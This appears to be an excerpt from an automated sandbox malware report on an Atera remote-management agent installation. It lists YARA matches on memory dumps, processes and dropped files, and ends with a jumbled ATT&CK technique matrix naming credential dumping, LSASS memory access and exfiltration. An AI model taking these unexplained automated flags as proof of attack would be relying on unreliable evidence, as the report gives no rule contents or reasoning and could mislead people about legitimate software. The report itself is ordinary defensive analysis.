                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E22363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.2750455725.00000269218B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2246580986.0000021E95E0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2088596650.000001F71CD62000.00000002.00000001.01000000.0000001F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2678972153.000002EF73D30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630AFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2246818661.0000021E96040000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2678972153.000002EF73DBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2294760147.0000021C42109000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C429FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.3060991724.000000403D931000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2537521563.0000025FBFBCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2534525146.0000025FBFA22000.00000002.00000001.01000000.0000003D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2678972153.000002EF73E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2967276692.00000153FCD18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2788198882.0000029E3B3C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630CD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E22003000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C429EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2691314024.000002EF74E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B828BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E223B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2787905123.0000029E3B3C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2782802387.000002203A0C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2117541148.000001F735B47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2130001397.000001F736A95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1981577832.000002150008D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2678972153.000002EF73D72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2673282375.000002162FDA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2513781301.0000025FBF32C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2398010393.00000281D6A40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.2755592246.00000269215EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2432153923.0000018457560000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1999548038.000002474091A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1752871469.000001779DBF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000038.00000002.2594283775.00000000001D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2678972153.000002EF73DF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2898620667.00000216491D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2689903902.0000029E21700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2967276692.00000153FCDD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2117541148.000001F735AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2432153923.000001845759E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2459812638.0000018457F13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1984014112.000002156BD20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153805C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2679569967.0000029E214C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2673282375.000002162FE25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1982795635.0000015E7D0C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2679569967.0000029E214FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2679569967.0000029E214C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1752871469.000001779DC31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1983167584.000002156BA8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.000001538059E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E223E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2790839667.0000029E3B5E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2086789811.000001F71CC4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B828B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2432153923.000001845757B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1755843182.000001779F829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2905094619.000002164924B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2875938217.0000021648EF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2787431143.0000029E3B1B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2420250702.0000022B8206B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153804BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2000576875.0000024741089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000038.00000002.2600454958.0000000000570000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.000001538063F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2905094619.0000021649282000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B828BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2420250702.0000022B81FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.000002163092E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1983167584.000002156BA42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2673282375.000002162FDFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000000.2019302027.000002EF73BC2000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.0000015380590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2972609455.00000153FD172000.00000002.00000001.01000000.00000049.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2624626748.000002EF0007B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E21F5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2420250702.0000022B81FAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2420250702.0000022B81FED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1999548038.0000024740899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1981577832.0000021500001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2320145221.00000281BD94C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1755843182.000001779F85A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2976094132.00000153FD49F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2967276692.00000153FCD2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2364577218.0000021C5B3A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.2714070273.0000026922065000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2673282375.000002162FDDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1755843182.000001779F8D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B828B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2086789811.000001F71CC40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2790839667.0000029E3B677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E21CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1755843182.000001779F852000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2679569967.0000029E214DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1983698172.0000015E7D250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B828AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2000576875.0000024741011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2691314024.000002EF74DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2981477200.00000153FE0A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.00000216304E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1983167584.000002156BA4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2773209313.0000022039F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2117541148.000001F735AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 7800, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 7856, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 7948, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AteraAgent.exe PID: 8184, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AteraAgent.exe PID: 3652, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 7452, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7344, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 3084, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7248, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AteraAgent.exe PID: 3492, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7700, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageSTRemote.exe PID: 7568, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageMonitoring.exe PID: 8096, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: cmd.exe PID: 6912, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: cscript.exe PID: 416, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 8020, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageTicketing.exe PID: 5768, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 1340, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageInternalPoller.exe PID: 1784, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageProgramManagement.exe PID: 3248, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 1900, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6044, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: SplashtopStreamer.exe PID: 7000, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageSystemTools.exe PID: 1696, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: AgentPackageMonitoring.exe PID: 4048, type: MEMORYSTR
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DFB6CCB0CC037A0B87.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF4ABAF93AAD4B12FE.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dll, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DFD7C2903EF9D68D12.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSIA7C1.tmp, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF14B7E2773E7C33C4.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\AteraSetupLog.txt, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DFE507A9E0C295E778.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, type: DROPPED
                                Source: Yara match, File source: C:\Config.Msi\692c47.rbs, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DFB27147300DD38853.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF2C154A89BDA544DA.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DFF490C3560564DA83.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DFEE64D0168B710AC4.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF9A4574B4F262FBE9.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSICA70.tmp, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DFDAABEC74117CC1C6.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF18C3B2AA98B412A3.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF13A48084247EF5A1.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF767FEA75492F0964.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_15-log.txt, type: DROPPED
                                Source: Yara match, File source: C:\Config.Msi\692c4f.rbs, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, type: DROPPED
                                Source: Yara match, File source: C:\Config.Msi\692c42.rbs, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF9CDD7DFF0A80F0FA.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF884CE156ACD16DC3.TMP, type: DROPPED
                                Source: Yara match, File source: \Device\ConDrv, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_25-log.txt, type: DROPPED
                                Source: Yara match, File source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF59C1AFBE99E78D01.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Temp\~DF66386BAAA34E81A4.TMP, type: DROPPED
                                Source: Yara match, File source: C:\Windows\Installer\MSI41D0.tmp, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Code function: 35_2_00007FFDEE42B9F0 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_snprintf,OutputDebugStringA
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information1
                                Scripting
                                1
                                Replication Through Removable Media
                                641
                                Windows Management Instrumentation
                                1
                                Scripting
                                1
                                DLL Side-Loading
                                21
                                Disable or Modify Tools
                                OS Credential Dumping2
                                System Time Discovery
                                Remote Services11
                                Archive Collected Data
                                2
                                Encrypted Channel
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts1
                                Native API
                                1
                                DLL Side-Loading
                                22
                                Windows Service
                                11
                                Deobfuscate/Decode Files or Information
                                LSASS Memory11
                                Peripheral Device Discovery
